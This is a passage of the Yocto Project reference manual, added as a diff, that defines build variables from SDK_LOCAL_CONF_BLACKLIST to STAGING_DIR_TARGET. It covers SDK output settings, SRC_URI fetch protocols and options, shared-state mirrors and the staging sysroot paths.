+      Extensible Software Development Kit (eSDK) manual.
+
+   :term:`SDK_LOCAL_CONF_BLACKLIST`
+      A list of variables not allowed through from the OpenEmbedded build
+      system configuration into the extensible SDK configuration. Usually,
+      these are variables that are specific to the machine on which the
+      build system is running and thus would be potentially problematic
+      within the extensible SDK.
+
+      By default, ``SDK_LOCAL_CONF_BLACKLIST`` is set in the
+      :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class and
+      excludes the following variables:
+
+      - :term:`CONF_VERSION`
+      - :term:`BB_NUMBER_THREADS`
+      - :term:`bitbake:BB_NUMBER_PARSE_THREADS`
+      - :term:`PARALLEL_MAKE`
+      - :term:`PRSERV_HOST`
+      - :term:`SSTATE_MIRRORS` :term:`DL_DIR`
+      - :term:`SSTATE_DIR` :term:`TMPDIR`
+      - :term:`BB_SERVER_TIMEOUT`
+
+      For additional information on how to customize the extensible SDK's
+      configuration, see the
+      ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+      section in the Yocto Project Application Development and the
+      Extensible Software Development Kit (eSDK) manual.
+
+   :term:`SDK_LOCAL_CONF_WHITELIST`
+      A list of variables allowed through from the OpenEmbedded build
+      system configuration into the extensible SDK configuration. By
+      default, the list of variables is empty and is set in the
+      :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class.
+
+      This list overrides the variables specified using the
+      :term:`SDK_LOCAL_CONF_BLACKLIST`
+      variable as well as any variables identified by automatic
+      blacklisting due to the "/" character being found at the start of the
+      value, which is usually indicative of being a path and thus might not
+      be valid on the system where the SDK is installed.
+
+      For additional information on how to customize the extensible SDK's
+      configuration, see the
+      ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+      section in the Yocto Project Application Development and the
+      Extensible Software Development Kit (eSDK) manual.
+
+   :term:`SDK_NAME`
+      The base name for SDK output files. The name is derived from the
+      :term:`DISTRO`, :term:`TCLIBC`,
+      :term:`SDK_ARCH`,
+      :term:`IMAGE_BASENAME`, and
+      :term:`TUNE_PKGARCH` variables:
+      ::
+
+         SDK_NAME = "${DISTRO}-${TCLIBC}-${SDK_ARCH}-${IMAGE_BASENAME}-${TUNE_PKGARCH}"
+
+   :term:`SDK_OS`
+      Specifies the operating system for which the SDK will be built. The
+      default value is the value of :term:`BUILD_OS`.
+
+   :term:`SDK_OUTPUT`
+      The location used by the OpenEmbedded build system when creating SDK
+      output. The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+      class defines the variable as follows:
+      ::
+
+         SDK_DIR = "${WORKDIR}/sdk"
+         SDK_OUTPUT = "${SDK_DIR}/image"
+         SDK_DEPLOY = "${DEPLOY_DIR}/sdk"
+
+      .. note::
+
+         The ``SDK_OUTPUT`` directory is a temporary directory as it is part of
+         :term:`WORKDIR` by way of :term:`SDK_DIR`. The final output directory is
+         :term:`SDK_DEPLOY`.
+
+   :term:`SDK_PACKAGE_ARCHS`
+      Specifies a list of architectures compatible with the SDK machine.
+      This variable is set automatically and should not normally be
+      hand-edited. Entries are separated using spaces and listed in order
+      of priority. The default value for ``SDK_PACKAGE_ARCHS`` is "all any
+      noarch ${SDK_ARCH}-${SDKPKGSUFFIX}".
+
+   :term:`SDK_POSTPROCESS_COMMAND`
+      Specifies a list of functions to call once the OpenEmbedded build
+      system creates the SDK. You can specify functions separated by
+      semicolons: SDK_POSTPROCESS_COMMAND += "function; ... "
+
+      If you need to pass an SDK path to a command within a function, you
+      can use ``${SDK_DIR}``, which points to the parent directory used by
+      the OpenEmbedded build system when creating SDK output. See the
+      :term:`SDK_DIR` variable for more information.
+
+   :term:`SDK_PREFIX`
+      The toolchain binary prefix used for ``nativesdk`` recipes. The
+      OpenEmbedded build system uses the ``SDK_PREFIX`` value to set the
+      :term:`TARGET_PREFIX` when building
+      ``nativesdk`` recipes. The default value is "${SDK_SYS}-".
+
+   :term:`SDK_RECRDEP_TASKS`
+      A list of shared state tasks added to the extensible SDK. By default,
+      the following tasks are added:
+
+      - do_populate_lic
+      - do_package_qa
+      - do_populate_sysroot
+      - do_deploy
+
+      Despite the default value of "" for the
+      ``SDK_RECRDEP_TASKS`` variable, the above four tasks are always added
+      to the SDK. To specify tasks beyond these four, you need to use the
+      ``SDK_RECRDEP_TASKS`` variable (e.g. you are defining additional
+      tasks that are needed in order to build
+      :term:`SDK_TARGETS`).
+
+   :term:`SDK_SYS`
+      Specifies the system, including the architecture and the operating
+      system, for which the SDK will be built.
+
+      The OpenEmbedded build system automatically sets this variable based
+      on :term:`SDK_ARCH`,
+      :term:`SDK_VENDOR`, and
+      :term:`SDK_OS`. You do not need to set the ``SDK_SYS``
+      variable yourself.
+
+   :term:`SDK_TARGET_MANIFEST`
+      The manifest file for the target part of the SDK. This file lists all
+      the installed packages that make up the target part of the SDK. The
+      file contains package information on a line-per-package basis as
+      follows:
+      ::
+
+         packagename packagearch version
+
+      The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class
+      defines the manifest file as follows:
+      ::
+
+         SDK_TARGET_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.target.manifest"
+
+      The location is derived using the :term:`SDK_DEPLOY` and
+      :term:`TOOLCHAIN_OUTPUTNAME` variables.
+
+   :term:`SDK_TARGETS`
+      A list of targets to install from shared state as part of the
+      standard or extensible SDK installation. The default value is "${PN}"
+      (i.e. the image from which the SDK is built).
+
+      The ``SDK_TARGETS`` variable is an internal variable and typically
+      would not be changed.
+
+   :term:`SDK_TITLE`
+      The title to be printed when running the SDK installer. By default,
+      this title is based on the :term:`DISTRO_NAME` or
+      :term:`DISTRO` variable and is set in the
+      :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class as
+      follows:
+      ::
+
+         SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
+
+      For the default distribution "poky",
+      ``SDK_TITLE`` is set to "Poky (Yocto Project Reference Distro)".
+
+      For information on how to change this default title, see the
+      ":ref:`sdk-manual/sdk-appendix-customizing:changing the extensible sdk installer title`"
+      section in the Yocto Project Application Development and the
+      Extensible Software Development Kit (eSDK) manual.
+
+   :term:`SDK_UPDATE_URL`
+      An optional URL for an update server for the extensible SDK. If set,
+      the value is used as the default update server when running
+      ``devtool sdk-update`` within the extensible SDK.
+
+   :term:`SDK_VENDOR`
+      Specifies the name of the SDK vendor.
+
+   :term:`SDK_VERSION`
+      Specifies the version of the SDK. The distribution configuration file
+      (e.g. ``/meta-poky/conf/distro/poky.conf``) defines the
+      ``SDK_VERSION`` as follows:
+      ::
+
+         SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}','snapshot')}"
+
+      For additional information, see the
+      :term:`DISTRO_VERSION` and
+      :term:`DATE` variables.
+
+   :term:`SDKEXTPATH`
+      The default installation directory for the Extensible SDK. By
+      default, this directory is based on the :term:`DISTRO`
+      variable and is set in the
+      :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class as
+      follows:
+      ::
+
+         SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
+
+      For the
+      default distribution "poky", the ``SDKEXTPATH`` is set to "poky_sdk".
+
+      For information on how to change this default directory, see the
+      ":ref:`sdk-manual/sdk-appendix-customizing:changing the default sdk installation directory`"
+      section in the Yocto Project Application Development and the
+      Extensible Software Development Kit (eSDK) manual.
+
+   :term:`SDKIMAGE_FEATURES`
+      Equivalent to ``IMAGE_FEATURES``. However, this variable applies to
+      the SDK generated from an image using the following command:
+      ::
+
+         $ bitbake -c populate_sdk imagename
+
+   :term:`SDKMACHINE`
+      The machine for which the SDK is built. In other words, the SDK is
+      built such that it runs on the target you specify with the
+      ``SDKMACHINE`` value. The value points to a corresponding ``.conf``
+      file under ``conf/machine-sdk/``.
+
+      You can use "i686" and "x86_64" as possible values for this variable.
+      The variable defaults to "i686" and is set in the local.conf file in
+      the Build Directory.
+      ::
+
+         SDKMACHINE ?= "i686"
+
+      .. note::
+
+         You cannot set the ``SDKMACHINE``
+         variable in your distribution configuration file. If you do, the
+         configuration will not take affect.
+
+   :term:`SDKPATH`
+      Defines the path offered to the user for installation of the SDK that
+      is generated by the OpenEmbedded build system. The path appears as
+      the default location for installing the SDK when you run the SDK's
+      installation script. You can override the offered path when you run
+      the script.
+
+   :term:`SDKTARGETSYSROOT`
+      The full path to the sysroot used for cross-compilation within an SDK
+      as it will be when installed into the default
+      :term:`SDKPATH`.
+
+   :term:`SECTION`
+      The section in which packages should be categorized. Package
+      management utilities can make use of this variable.
+
+   :term:`SELECTED_OPTIMIZATION`
+      Specifies the optimization flags passed to the C compiler when
+      building for the target. The flags are passed through the default
+      value of the :term:`TARGET_CFLAGS` variable.
+
+      The ``SELECTED_OPTIMIZATION`` variable takes the value of
+      ``FULL_OPTIMIZATION`` unless ``DEBUG_BUILD`` = "1". If that is the
+      case, the value of ``DEBUG_OPTIMIZATION`` is used.
+
+   :term:`SERIAL_CONSOLE`
+      Defines a serial console (TTY) to enable using
+      `getty <https://en.wikipedia.org/wiki/Getty_(Unix)>`__. Provide a
+      value that specifies the baud rate followed by the TTY device name
+      separated by a space. You cannot specify more than one TTY device:
+      ::
+
+         SERIAL_CONSOLE = "115200 ttyS0"
+
+      .. note::
+
+         The ``SERIAL_CONSOLE`` variable is deprecated. Please use the
+         :term:`SERIAL_CONSOLES` variable.
+
+   :term:`SERIAL_CONSOLES`
+      Defines a serial console (TTY) to enable using
+      `getty <https://en.wikipedia.org/wiki/Getty_(Unix)>`__. Provide a
+      value that specifies the baud rate followed by the TTY device name
+      separated by a semicolon. Use spaces to separate multiple devices:
+      ::
+
+         SERIAL_CONSOLES = "115200;ttyS0 115200;ttyS1"
+
+   :term:`SERIAL_CONSOLES_CHECK`
+      Specifies serial consoles, which must be listed in
+      :term:`SERIAL_CONSOLES`, to check against
+      ``/proc/console`` before enabling them using getty. This variable
+      allows aliasing in the format: <device>:<alias>. If a device was
+      listed as "sclp_line0" in ``/dev/`` and "ttyS0" was listed in
+      ``/proc/console``, you would do the following: ::
+
+         SERIAL_CONSOLES_CHECK = "slcp_line0:ttyS0"
+
+      This variable is currently only supported with SysVinit (i.e. not
+      with systemd).
+
+   :term:`SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS`
+      A list of recipe dependencies that should not be used to determine
+      signatures of tasks from one recipe when they depend on tasks from
+      another recipe. For example: ::
+
+         SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "intone->mplayer2"
+
+      In the previous example, ``intone`` depends on ``mplayer2``.
+
+      You can use the special token ``"*"`` on the left-hand side of the
+      dependency to match all recipes except the one on the right-hand
+      side. Here is an example: ::
+
+         SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "*->quilt-native"
+
+      In the previous example, all recipes except ``quilt-native`` ignore
+      task signatures from the ``quilt-native`` recipe when determining
+      their task signatures.
+
+      Use of this variable is one mechanism to remove dependencies that
+      affect task signatures and thus force rebuilds when a recipe changes.
+
+      .. note::
+
+         If you add an inappropriate dependency for a recipe relationship,
+         the software might break during runtime if the interface of the
+         second recipe was changed after the first recipe had been built.
+
+   :term:`SIGGEN_EXCLUDERECIPES_ABISAFE`
+      A list of recipes that are completely stable and will never change.
+      The ABI for the recipes in the list are presented by output from the
+      tasks run to build the recipe. Use of this variable is one way to
+      remove dependencies from one recipe on another that affect task
+      signatures and thus force rebuilds when the recipe changes.
+
+      .. note::
+
+         If you add an inappropriate variable to this list, the software
+         might break at runtime if the interface of the recipe was changed
+         after the other had been built.
+
+   :term:`SITEINFO_BITS`
+      Specifies the number of bits for the target system CPU. The value
+      should be either "32" or "64".
+
+   :term:`SITEINFO_ENDIANNESS`
+      Specifies the endian byte order of the target system. The value
+      should be either "le" for little-endian or "be" for big-endian.
+
+   :term:`SKIP_FILEDEPS`
+      Enables removal of all files from the "Provides" section of an RPM
+      package. Removal of these files is required for packages containing
+      prebuilt binaries and libraries such as ``libstdc++`` and ``glibc``.
+
+      To enable file removal, set the variable to "1" in your
+      ``conf/local.conf`` configuration file in your:
+      :term:`Build Directory`.
+      ::
+
+         SKIP_FILEDEPS = "1"
+
+   :term:`SOC_FAMILY`
+      Groups together machines based upon the same family of SOC (System On
+      Chip). You typically set this variable in a common ``.inc`` file that
+      you include in the configuration files of all the machines.
+
+      .. note::
+
+         You must include ``conf/machine/include/soc-family.inc`` for this
+         variable to appear in :term:`MACHINEOVERRIDES`.
+
+   :term:`SOLIBS`
+      Defines the suffix for shared libraries used on the target platform.
+      By default, this suffix is ".so.*" for all Linux-based systems and is
+      defined in the ``meta/conf/bitbake.conf`` configuration file.
+
+      You will see this variable referenced in the default values of
+      ``FILES_${PN}``.
+
+   :term:`SOLIBSDEV`
+      Defines the suffix for the development symbolic link (symlink) for
+      shared libraries on the target platform. By default, this suffix is
+      ".so" for Linux-based systems and is defined in the
+      ``meta/conf/bitbake.conf`` configuration file.
+
+      You will see this variable referenced in the default values of
+      ``FILES_${PN}-dev``.
+
+   :term:`SOURCE_MIRROR_FETCH`
+      When you are fetching files to create a mirror of sources (i.e.
+      creating a source mirror), setting ``SOURCE_MIRROR_FETCH`` to "1" in
+      your ``local.conf`` configuration file ensures the source for all
+      recipes are fetched regardless of whether or not a recipe is
+      compatible with the configuration. A recipe is considered
+      incompatible with the currently configured machine when either or
+      both the :term:`COMPATIBLE_MACHINE`
+      variable and :term:`COMPATIBLE_HOST` variables
+      specify compatibility with a machine other than that of the current
+      machine or host.
+
+      .. note::
+
+         Do not set the ``SOURCE_MIRROR_FETCH``
+         variable unless you are creating a source mirror. In other words,
+         do not set the variable during a normal build.
+
+   :term:`SOURCE_MIRROR_URL`
+      Defines your own :term:`PREMIRRORS` from which to
+      first fetch source before attempting to fetch from the upstream
+      specified in :term:`SRC_URI`.
+
+      To use this variable, you must globally inherit the
+      :ref:`own-mirrors <ref-classes-own-mirrors>` class and then provide
+      the URL to your mirrors. Here is the general syntax:
+      ::
+
+         INHERIT += "own-mirrors"
+         SOURCE_MIRROR_URL = "http://example.com/my_source_mirror"
+
+      .. note::
+
+         You can specify only a single URL in ``SOURCE_MIRROR_URL``.
+
+   :term:`SPDXLICENSEMAP`
+      Maps commonly used license names to their SPDX counterparts found in
+      ``meta/files/common-licenses/``. For the default ``SPDXLICENSEMAP``
+      mappings, see the ``meta/conf/licenses.conf`` file.
+
+      For additional information, see the :term:`LICENSE`
+      variable.
+
+   :term:`SPECIAL_PKGSUFFIX`
+      A list of prefixes for :term:`PN` used by the OpenEmbedded
+      build system to create variants of recipes or packages. The list
+      specifies the prefixes to strip off during certain circumstances such
+      as the generation of the :term:`BPN` variable.
+
+   :term:`SPL_BINARY`
+      The file type for the Secondary Program Loader (SPL). Some devices
+      use an SPL from which to boot (e.g. the BeagleBone development
+      board). For such cases, you can declare the file type of the SPL
+      binary in the ``u-boot.inc`` include file, which is used in the
+      U-Boot recipe.
+
+      The SPL file type is set to "null" by default in the ``u-boot.inc``
+      file as follows:
+      ::
+
+         # Some versions of u-boot build an SPL (Second Program Loader) image that
+         # should be packaged along with the u-boot binary as well as placed in the
+         # deploy directory. For those versions they can set the following variables
+         # to allow packaging the SPL.
+         SPL_BINARY ?= ""
+         SPL_BINARYNAME ?= "${@os.path.basename(d.getVar("SPL_BINARY"))}"
+         SPL_IMAGE ?= "${SPL_BINARYNAME}-${MACHINE}-${PV}-${PR}"
+         SPL_SYMLINK ?= "${SPL_BINARYNAME}-${MACHINE}"
+
+      The ``SPL_BINARY`` variable helps form
+      various ``SPL_*`` variables used by the OpenEmbedded build system.
+
+      See the BeagleBone machine configuration example in the
+      ":ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`"
+      section in the Yocto Project Board Support Package Developer's Guide
+      for additional information.
+
+   :term:`SRC_URI`
+      The list of source files - local or remote. This variable tells the
+      OpenEmbedded build system which bits to pull in for the build and how
+      to pull them in. For example, if the recipe or append file only needs
+      to fetch a tarball from the Internet, the recipe or append file uses
+      a single ``SRC_URI`` entry. On the other hand, if the recipe or
+      append file needs to fetch a tarball, apply two patches, and include
+      a custom file, the recipe or append file would include four instances
+      of the variable.
+
+      The following list explains the available URI protocols. URI
+      protocols are highly dependent on particular BitBake Fetcher
+      submodules. Depending on the fetcher BitBake uses, various URL
+      parameters are employed. For specifics on the supported Fetchers, see
+      the ":ref:`Fetchers <bitbake:bb-fetchers>`" section in the
+      BitBake User Manual.
+
+      -  ``file://`` - Fetches files, which are usually files shipped
+         with the :term:`Metadata`, from the local machine (e.g.
+         :ref:`patch <patching-dev-environment>` files).
+         The path is relative to the :term:`FILESPATH`
+         variable. Thus, the build system searches, in order, from the
+         following directories, which are assumed to be a subdirectories of
+         the directory in which the recipe file (``.bb``) or append file
+         (``.bbappend``) resides:
+
+         -  ``${BPN}`` - The base recipe name without any special suffix
+            or version numbers.
+
+         -  ``${BP}`` - ``${BPN}-${PV}``. The base recipe name and
+            version but without any special package name suffix.
+
+         -  *files -* Files within a directory, which is named ``files``
+            and is also alongside the recipe or append file.
+
+         .. note::
+
+            If you want the build system to pick up files specified through
+            a
+            SRC_URI
+            statement from your append file, you need to be sure to extend
+            the
+            FILESPATH
+            variable by also using the
+            FILESEXTRAPATHS
+            variable from within your append file.
+
+      -  ``bzr://`` - Fetches files from a Bazaar revision control
+         repository.
+
+      -  ``git://`` - Fetches files from a Git revision control
+         repository.
+
+      -  ``osc://`` - Fetches files from an OSC (OpenSUSE Build service)
+         revision control repository.
+
+      -  ``repo://`` - Fetches files from a repo (Git) repository.
+
+      -  ``ccrc://`` - Fetches files from a ClearCase repository.
+
+      -  ``http://`` - Fetches files from the Internet using ``http``.
+
+      -  ``https://`` - Fetches files from the Internet using ``https``.
+
+      -  ``ftp://`` - Fetches files from the Internet using ``ftp``.
+
+      -  ``cvs://`` - Fetches files from a CVS revision control
+         repository.
+
+      -  ``hg://`` - Fetches files from a Mercurial (``hg``) revision
+         control repository.
+
+      -  ``p4://`` - Fetches files from a Perforce (``p4``) revision
+         control repository.
+
+      -  ``ssh://`` - Fetches files from a secure shell.
+
+      -  ``svn://`` - Fetches files from a Subversion (``svn``) revision
+         control repository.
+
+      -  ``npm://`` - Fetches JavaScript modules from a registry.
+
+      Standard and recipe-specific options for ``SRC_URI`` exist. Here are
+      standard options:
+
+      -  ``apply`` - Whether to apply the patch or not. The default
+         action is to apply the patch.
+
+      -  ``striplevel`` - Which striplevel to use when applying the
+         patch. The default level is 1.
+
+      -  ``patchdir`` - Specifies the directory in which the patch should
+         be applied. The default is ``${``\ :term:`S`\ ``}``.
+
+      Here are options specific to recipes building code from a revision
+      control system:
+
+      -  ``mindate`` - Apply the patch only if
+         :term:`SRCDATE` is equal to or greater than
+         ``mindate``.
+
+      -  ``maxdate`` - Apply the patch only if ``SRCDATE`` is not later
+         than ``maxdate``.
+
+      -  ``minrev`` - Apply the patch only if ``SRCREV`` is equal to or
+         greater than ``minrev``.
+
+      -  ``maxrev`` - Apply the patch only if ``SRCREV`` is not later
+         than ``maxrev``.
+
+      -  ``rev`` - Apply the patch only if ``SRCREV`` is equal to
+         ``rev``.
+
+      -  ``notrev`` - Apply the patch only if ``SRCREV`` is not equal to
+         ``rev``.
+
+      Here are some additional options worth mentioning:
+
+      -  ``unpack`` - Controls whether or not to unpack the file if it is
+         an archive. The default action is to unpack the file.
+
+      -  ``destsuffix`` - Places the file (or extracts its contents) into
+         the specified subdirectory of :term:`WORKDIR` when
+         the Git fetcher is used.
+
+      -  ``subdir`` - Places the file (or extracts its contents) into the
+         specified subdirectory of ``WORKDIR`` when the local (``file://``)
+         fetcher is used.
+
+      -  ``localdir`` - Places the file (or extracts its contents) into
+         the specified subdirectory of ``WORKDIR`` when the CVS fetcher is
+         used.
+
+      -  ``subpath`` - Limits the checkout to a specific subpath of the
+         tree when using the Git fetcher is used.
+
+      -  ``name`` - Specifies a name to be used for association with
+         ``SRC_URI`` checksums or :term:`SRCREV` when you have more than one
+         file or git repository specified in ``SRC_URI``. For example:
+         ::
+
+            SRC_URI = "git://example.com/foo.git;name=first \
+                       git://example.com/bar.git;name=second \
+                       http://example.com/file.tar.gz;name=third"
+
+            SRCREV_first = "f1d2d2f924e986ac86fdf7b36c94bcdf32beec15"
+            SRCREV_second = "e242ed3bffccdf271b7fbaf34ed72d089537b42f"
+            SRC_URI[third.sha256sum] = "13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de"
+
+
+      -  ``downloadfilename`` - Specifies the filename used when storing
+         the downloaded file.
+
+   :term:`SRC_URI_OVERRIDES_PACKAGE_ARCH`
+      By default, the OpenEmbedded build system automatically detects
+      whether ``SRC_URI`` contains files that are machine-specific. If so,
+      the build system automatically changes ``PACKAGE_ARCH``. Setting this
+      variable to "0" disables this behavior.
+
+   :term:`SRCDATE`
+      The date of the source code used to build the package. This variable
+      applies only if the source was fetched from a Source Code Manager
+      (SCM).
+
+   :term:`SRCPV`
+      Returns the version string of the current package. This string is
+      used to help define the value of :term:`PV`.
+
+      The ``SRCPV`` variable is defined in the ``meta/conf/bitbake.conf``
+      configuration file in the :term:`Source Directory` as
+      follows:
+      ::
+
+         SRCPV = "${@bb.fetch2.get_srcrev(d)}"
+
+      Recipes that need to define ``PV`` do so with the help of the
+      ``SRCPV``. For example, the ``ofono`` recipe (``ofono_git.bb``)
+      located in ``meta/recipes-connectivity`` in the Source Directory
+      defines ``PV`` as follows:
+      ::
+
+         PV = "0.12-git${SRCPV}"
+
+   :term:`SRCREV`
+      The revision of the source code used to build the package. This
+      variable applies to Subversion, Git, Mercurial, and Bazaar only. Note
+      that if you want to build a fixed revision and you want to avoid
+      performing a query on the remote repository every time BitBake parses
+      your recipe, you should specify a ``SRCREV`` that is a full revision
+      identifier and not just a tag.
+
+      .. note::
+
+         For information on limitations when inheriting the latest revision
+         of software using ``SRCREV``, see the :term:`AUTOREV` variable
+         description and the
+         ":ref:`automatically-incrementing-a-binary-package-revision-number`"
+         section, which is in the Yocto Project Development Tasks Manual.
+
+   :term:`SSTATE_DIR`
+      The directory for the shared state cache.
+
+   :term:`SSTATE_EXCLUDEDEPS_SYSROOT`
+      This variable allows to specify indirect dependencies to exclude
+      from sysroots, for example to avoid the situations when a dependency on
+      any ``-native`` recipe will pull in all dependencies of that recipe
+      in the recipe sysroot. This behaviour might not always be wanted,
+      for example when that ``-native`` recipe depends on build tools
+      that are not relevant for the current recipe.
+
+      This way, irrelevant dependencies are ignored, which could have
+      prevented the reuse of prebuilt artifacts stored in the Shared
+      State Cache.
+
+      :term:`SSTATE_EXCLUDEDEPS_SYSROOT` is evaluated as two regular
+      expressions of recipe and dependency to ignore. An example
+      is the rule in :oe_git:`meta/conf/layer.conf </openembedded-core/tree/meta/conf/layer.conf>`::
+
+         # Nothing needs to depend on libc-initial
+         # base-passwd/shadow-sysroot don't need their dependencies
+         SSTATE_EXCLUDEDEPS_SYSROOT += "\
+             .*->.*-initial.* \
+             .*(base-passwd|shadow-sysroot)->.* \
+         "
+
+      The ``->`` substring represents the dependency between
+      the two regular expressions.
+
+   :term:`SSTATE_MIRROR_ALLOW_NETWORK`
+      If set to "1", allows fetches from mirrors that are specified in
+      :term:`SSTATE_MIRRORS` to work even when
+      fetching from the network is disabled by setting ``BB_NO_NETWORK`` to
+      "1". Using the ``SSTATE_MIRROR_ALLOW_NETWORK`` variable is useful if
+      you have set ``SSTATE_MIRRORS`` to point to an internal server for
+      your shared state cache, but you want to disable any other fetching
+      from the network.
+
+   :term:`SSTATE_MIRRORS`
+      Configures the OpenEmbedded build system to search other mirror
+      locations for prebuilt cache data objects before building out the
+      data. This variable works like fetcher :term:`MIRRORS`
+      and :term:`PREMIRRORS` and points to the cache
+      locations to check for the shared state (sstate) objects.
+
+      You can specify a filesystem directory or a remote URL such as HTTP
+      or FTP. The locations you specify need to contain the shared state
+      cache (sstate-cache) results from previous builds. The sstate-cache
+      you point to can also be from builds on other machines.
+
+      When pointing to sstate build artifacts on another machine that uses
+      a different GCC version for native builds, you must configure
+      ``SSTATE_MIRRORS`` with a regular expression that maps local search
+      paths to server paths. The paths need to take into account
+      :term:`NATIVELSBSTRING` set by the
+      :ref:`uninative <ref-classes-uninative>` class. For example, the
+      following maps the local search path ``universal-4.9`` to the
+      server-provided path server_url_sstate_path:
+      ::
+
+         SSTATE_MIRRORS ?= "file://universal-4.9/(.*) http://server_url_sstate_path/universal-4.8/\1 \n"
+
+      If a mirror uses the same structure as
+      :term:`SSTATE_DIR`, you need to add "PATH" at the
+      end as shown in the examples below. The build system substitutes the
+      correct path within the directory structure.
+      ::
+
+         SSTATE_MIRRORS ?= "\
+             file://.* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
+             file://.* file:///some-local-dir/sstate/PATH"
+
+   :term:`SSTATE_SCAN_FILES`
+      Controls the list of files the OpenEmbedded build system scans for
+      hardcoded installation paths. The variable uses a space-separated
+      list of filenames (not paths) with standard wildcard characters
+      allowed.
+
+      During a build, the OpenEmbedded build system creates a shared state
+      (sstate) object during the first stage of preparing the sysroots.
+      That object is scanned for hardcoded paths for original installation
+      locations. The list of files that are scanned for paths is controlled
+      by the ``SSTATE_SCAN_FILES`` variable. Typically, recipes add files
+      they want to be scanned to the value of ``SSTATE_SCAN_FILES`` rather
+      than the variable being comprehensively set. The
+      :ref:`sstate <ref-classes-sstate>` class specifies the default list
+      of files.
+
+      For details on the process, see the
+      :ref:`staging <ref-classes-staging>` class.
+
+   :term:`STAGING_BASE_LIBDIR_NATIVE`
+      Specifies the path to the ``/lib`` subdirectory of the sysroot
+      directory for the build host.
+
+   :term:`STAGING_BASELIBDIR`
+      Specifies the path to the ``/lib`` subdirectory of the sysroot
+      directory for the target for which the current recipe is being built
+      (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_BINDIR`
+      Specifies the path to the ``/usr/bin`` subdirectory of the sysroot
+      directory for the target for which the current recipe is being built
+      (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_BINDIR_CROSS`
+      Specifies the path to the directory containing binary configuration
+      scripts. These scripts provide configuration information for other
+      software that wants to make use of libraries or include files
+      provided by the software associated with the script.
+
+      .. note::
+
+         This style of build configuration has been largely replaced by
+         ``pkg-config``. Consequently, if ``pkg-config`` is supported by the
+         library to which you are linking, it is recommended you use
+         ``pkg-config`` instead of a provided configuration script.
+
+   :term:`STAGING_BINDIR_NATIVE`
+      Specifies the path to the ``/usr/bin`` subdirectory of the sysroot
+      directory for the build host.
+
+   :term:`STAGING_DATADIR`
+      Specifies the path to the ``/usr/share`` subdirectory of the sysroot
+      directory for the target for which the current recipe is being built
+      (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_DATADIR_NATIVE`
+      Specifies the path to the ``/usr/share`` subdirectory of the sysroot
+      directory for the build host.
+
+   :term:`STAGING_DIR`
+      Helps construct the ``recipe-sysroots`` directory, which is used
+      during packaging.
+
+      For information on how staging for recipe-specific sysroots occurs,
+      see the :ref:`ref-tasks-populate_sysroot`
+      task, the ":ref:`sdk-manual/sdk-extensible:sharing files between recipes`"
+      section in the Yocto Project Development Tasks Manual, the
+      ":ref:`configuration-compilation-and-staging-dev-environment`"
+      section in the Yocto Project Overview and Concepts Manual, and the
+      :term:`SYSROOT_DIRS` variable.
+
+      .. note::
+
+         Recipes should never write files directly under the ``STAGING_DIR``
+         directory because the OpenEmbedded build system manages the
+         directory automatically. Instead, files should be installed to
+         ``${``\ :term:`D`\ ``}`` within your recipe's :ref:`ref-tasks-install`
+         task and then the OpenEmbedded build system will stage a subset of
+         those files into the sysroot.
+
+   :term:`STAGING_DIR_HOST`
+      Specifies the path to the sysroot directory for the system on which
+      the component is built to run (the system that hosts the component).
+      For most recipes, this sysroot is the one in which that recipe's
+      :ref:`ref-tasks-populate_sysroot` task copies
+      files. Exceptions include ``-native`` recipes, where the
+      ``do_populate_sysroot`` task instead uses
+      :term:`STAGING_DIR_NATIVE`. Depending on
+      the type of recipe and the build target, ``STAGING_DIR_HOST`` can
+      have the following values:
+
+      -  For recipes building for the target machine, the value is
+         "${:term:`STAGING_DIR`}/${:term:`MACHINE`}".
+
+      -  For native recipes building for the build host, the value is empty
+         given the assumption that when building for the build host, the
+         build host's own directories should be used.
+
+         .. note::
+
+            ``-native`` recipes are not installed into host paths like such
+            as ``/usr``. Rather, these recipes are installed into
+            ``STAGING_DIR_NATIVE``. When compiling ``-native`` recipes,
+            standard build environment variables such as
+            :term:`CPPFLAGS` and
+            :term:`CFLAGS` are set up so that both host paths
+            and ``STAGING_DIR_NATIVE`` are searched for libraries and
+            headers using, for example, GCC's ``-isystem`` option.
+
+            Thus, the emphasis is that the ``STAGING_DIR*`` variables
+            should be viewed as input variables by tasks such as
+            :ref:`ref-tasks-configure`,
+            :ref:`ref-tasks-compile`, and
+            :ref:`ref-tasks-install`. Having the real system
+            root correspond to ``STAGING_DIR_HOST`` makes conceptual sense
+            for ``-native`` recipes, as they make use of host headers and
+            libraries.
+
+   :term:`STAGING_DIR_NATIVE`
+      Specifies the path to the sysroot directory used when building
+      components that run on the build host itself.
+
+   :term:`STAGING_DIR_TARGET`
+      Specifies the path to the sysroot used for the system for which the
+      component generates code. For components that do not generate code,
+      which is the majority, ``STAGING_DIR_TARGET`` is set to match
+      :term:`STAGING_DIR_HOST`.
+
+      Some recipes build binaries that can run on the target system but
+      those binaries in turn generate code for another different system
+      (e.g. cross-canadian recipes). Using terminology from GNU, the
+      primary system is referred to as the "HOST" and the secondary, or
+      different, system is referred to as the "TARGET". Thus, the binaries
+      run on the "HOST" system and generate binaries for the "TARGET"
+      system. The ``STAGING_DIR_HOST`` variable points to the sysroot used
+      for the "HOST" system, while ``STAGING_DIR_TARGET`` points to the
+      sysroot used for the "TARGET" system.
+
